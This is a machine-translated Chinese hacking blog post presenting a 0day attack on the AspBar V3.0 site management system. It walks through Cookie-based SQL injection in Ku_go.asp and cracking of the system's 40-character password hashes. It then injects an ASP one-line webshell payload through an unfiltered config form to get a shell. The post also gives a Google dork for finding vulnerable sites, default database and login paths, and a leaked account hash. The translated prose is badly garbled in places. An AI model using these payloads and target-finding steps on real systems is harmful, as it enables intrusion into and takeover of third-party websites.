佚名MYHACK58:62200924974AspBar V3. 0 the entire Station management system 0day-vulnerability warning-the black bar safety net
AspBar V3. 0 the entire Station management system for the presence of Cookies injection vulnerability
Ku_go. asp problem code:
<%id=request(“ku_id”)
set rsl=server. createobject(“adodb. recordset”)
sqll=“update ku_link set hits=hits+1 where ID=”&ID&“”
rsl. open sqll,conn,1,3
set rs=server. createobject(“adodb. recordset”)
sql=“select * from ku_link where id=”&id
rs. open sql,conn,1,3
System added anti-implantation, but simply looked under the anti-injection system, anti-very bad, only the filtered request. the querystring method, and request. form and request. The Cookies method is not the tube, which also caused a lot of security risks. But this system play a half day, a day spent only scored Shell. First, find a website, in the website link at the click the right mouse button, view the properties, get this address<http://localhost/Ku_go.asp?ku_id=15>, as shown:!
The use of injected transit, local Cookies injected, as shown in Figure: I get to the official account and password, but it didn’t find the background, depressed, give up! Note to manually add the table name!
Later, in the online to find a with this system the website, through Cookies injection, get the account number and password, the background is also there, but sick of the place, do not know everybody noticed no, the system password is 4 0, the ordinary of the MD5 encrypted are 1 6-bit and 3 2-bit, and later after the study that his encryption algorithm is such that 4 0 bit password in the first 1 6 bits is the plaintext password through MD5, the 1 6-bit encrypted password, and the 4 0 password 1 6 bits is the result of the MD5, the 3 2-bit encryption after the 1 6-bit, as 4 0 bit middle 8-bit and I don’t know how to. That’s a bit of a mouthful, in short, to get the password to take it before the 1 6-bit to crack, you can get the plaintext password. Then contact to the developer, after the Exchange became aware that the MD5 algorithm is someone else to write, really painstakingly Ah it! So sick. Well, get a password into the background after the first time think of Is see if there is no database backup, well, sure enough, immediately upload the pictures of horses, ready to backup, the more disgusting the place, the BACKUP DATABASE to the relative path and absolute path can’t be modified, view the source code after the discovery of more than a readonly, as follows: <form method=“post” action=“ku_data. asp? action=BackupData”>
<tr>
<td> current database path(absolute path)
<input name=“B_DBpath” type=“text” id=“B_DBpath” value=“…/Ku_data/Ku_database. mdb” size=“6 0” class=“button1” / readonly></td>
</tr>
<tr>
<td height=“2 5”>BACKUP DATABASE directory(absolute path)
<input name=“B_BKpath” type=“text” id=“B_BKpath” value=“…/Databackup” size=“6 0” class=“button1” / readonly></td>
</tr>
<tr>
<td>Backup Database Name(fill in name):
<input type=“button” name=“tjiao” value=“add date” />
<input name=“B_FileName” type=“text” id=“B_FileName” value=“beifen. sql” size=“3 5” class=“button1” / readonly>
<input name=“submit2” type=“submit” value=“OK backup” class=“button2” /></td>
</tr>
So can’t change the path, it will backup not, but this can be a breakthrough, the source code is saved to the Local, the value is changed you a picture of the horse’s path, then the <form method=“post” action=“ku_data. asp? action=BackupData”> the action value is changed to the full path, i.e., http://www.xxxxx.com/admin/ku_data.asp?action=BackupData, and after storage can be local to submit a backup, however when testing the problem again, the current database path and the backup directory can not be modified, changing any one will jump to thehttp://www.xxxxx.com/admin/ku_data.asp?action=BackupDatathe page, and the backup name can easily change, then depressed for a while, see a bit of a backup code, and found more and more disgusting things, Ku_Data. asp in the backup process is written so that Sub BackupData()
'On error resume next
Dim FileConnStr, Fileconn, B_DBpath, B_BKpath, B_FileName
B_DBpath = Request. Form(“B_DBpath”)
B_DBpath = Server. Mappath(B_DBpath) 'disgusting place in this, the original current path for the database from the form extraction, but much of this sentence, the database path is turned from the on the server made, the local modification of the path is invalid,
B_BKpath = Request. Form(“B_BKpath”)
B_BKpath = Server. Mappath(B_BKpath) ‘the backup directory is also so dry,
B_FileName = Request. Form(“B_FileName”) ‘ only backup name from the local submission,
FileConnStr = "Provider = Microsoft. Jet. OLEDB. 4. 0;Data Source = " & amp; B_DBpath
Set Fileconn = Server. CreateObject(“ADODB. Connection”)
Fileconn. open FileConnStr
To see this, since a name for the backup from the local obtain, so why not in the current database inserted into a word, and then backup into asp format, and then use a word connected after the backup of the database?, the idea is very simple, the reality is cruel, when I see the word as it is lying in the database, the connection, but the emergence of syntax error message, not my word, but he made the hands and feet, sad, it seems this road is to nowhere, then point to system settings, when suddenly came inspiration in the website configuration there to try to insert a word, and then connected to try, the word to the end, looked under System Configuration Ku_Setup. the asp page is written so that if action=“ok” then
webname = trim(Request. form(“webname”))
miaoshu = trim(Request. form(“miaoshu”))
http = trim(Request. form(“http”))
http = trim(Request. form(“http”))
banben = trim(Request. form(“banben”))
email = trim(Request. form(“email”))
dianhua = trim(Request. form(“dianhua”))
qq = trim(Request. form(“QQ”))
beian = trim(Request. form(“beian”))
tongji = trim(Request. form(“tongji”))
mokuai = trim(Request. form(“mokuai”))
database = trim(Request. form(“data”))
indexad = trim(Request. form(“indexad”))
artad = trim(Request. form(“artad”))
fenlei = trim(Request. form(“fenlei”))
cpad = trim(Request. form(“cpad”))
downad = trim(Request. form(“downad”))
kaifa = trim(Request. form(“kaifa”))
ad = trim(Request. form(“ad”))
voteincdir = server. mappath(“…/ku_inc/Ku_config. asp”)
Const ForReading =1, ForWriting = 2
set fs = CreateObject(“Scripting. FileSystemObject”)
set ts = fs. OpenTextFile(voteincdir,ForWriting, True)
ts. Write “”
ts. Write “<”
ts. Write “%”& vbCrLf
ts. Write " Ku_name= “&”“”“&webname&”“”“& vbCrLf
ts. Write " Ku_web= “&””“”&miaoshu&“”“”& vbCrLf
ts. Write " Ku_tongji= “&”“”“&tongji&”“”“& vbCrLf
ts. Write " Ku_beian= “&””“”&beian&“”“”& vbCrLf
ts. Write " Ku_net= “&”“”“&http&”“”“& vbCrLf
ts. Write " Ku_ban= “&””“”&banben&“”“”& vbCrLf
ts. Write " Ku_email= “&”“”“&email&”“”“& vbCrLf
ts. Write " Ku_tel = “&””“”&dianhua&“”“”& vbCrLf
ts. Write " Ku_qq = “&”“”“&qq&”“”“& vbCrLf
ts. Write " Ku_webzz = “&””“”&kaifa&“”“”& vbCrLf
ts. Write " Ku_mokuai= “&”“”“&mokuai&”“”“& vbCrLf
ts. Write " Ku_database= “&””“”&database&“”“”& vbCrLf
ts. Write " Ku_indexad= “&”“”“&indexad&”“”“& vbCrLf
ts. Write " Ku_artad= “&””“”&artad&“”“”& vbCrLf
ts. Write " Ku_fl= “&”“”“&fenlei&”“”“& vbCrLf
ts. Write " Ku_cpad= “&””“”&cpad&“”“”& vbCrLf
ts. Write " Ku_downad= “&”“”“&downad&”“”“& vbCrLf
ts. Write " Ku_adss= “&””“”&ad&“”“”& vbCrLf
ts. Write “%”
ts. Write “>”
ts. close
response. write “<script language=javascript>”
response. write “alert(‘system-related settings success!’);”
response. write “</script>”
response. redirect"ku_setup. asp"
end if
Directly from the form to obtain the information, and not filtered, then written to the ku_inc/Ku_config. asp file, the front also said, the anti-implantation only to the querystring cold, the other release, first in a local test, because here Word format write not be directly linked to off site, tested, in a Word format to "%><%execute(request(“cmd”))%><%', written in the developers there to submit after page refresh, not destruction!
Open ku_inc/Ku_config. asp page to see the familiar words, the words link up got the Shell!
Earlier the thought of this point, when it is not in the database where the blind toss,╮(╯▽╰)╭。
Use: Google for: inurl:Ku_shownews. asp background: admin/Ku_Login. asp default database: Ku_data\Ku_database. mdb can download the tap the chicken?)
There is also an online editor, landing address: Ku_web/Admin_Login. asp
Account is guxing, the password did not break out, MD5 encrypted is df8150673aaf363f, interested in your own crack!
Reproduced from: San ㄗ Feng 訫 locks of love’S Blog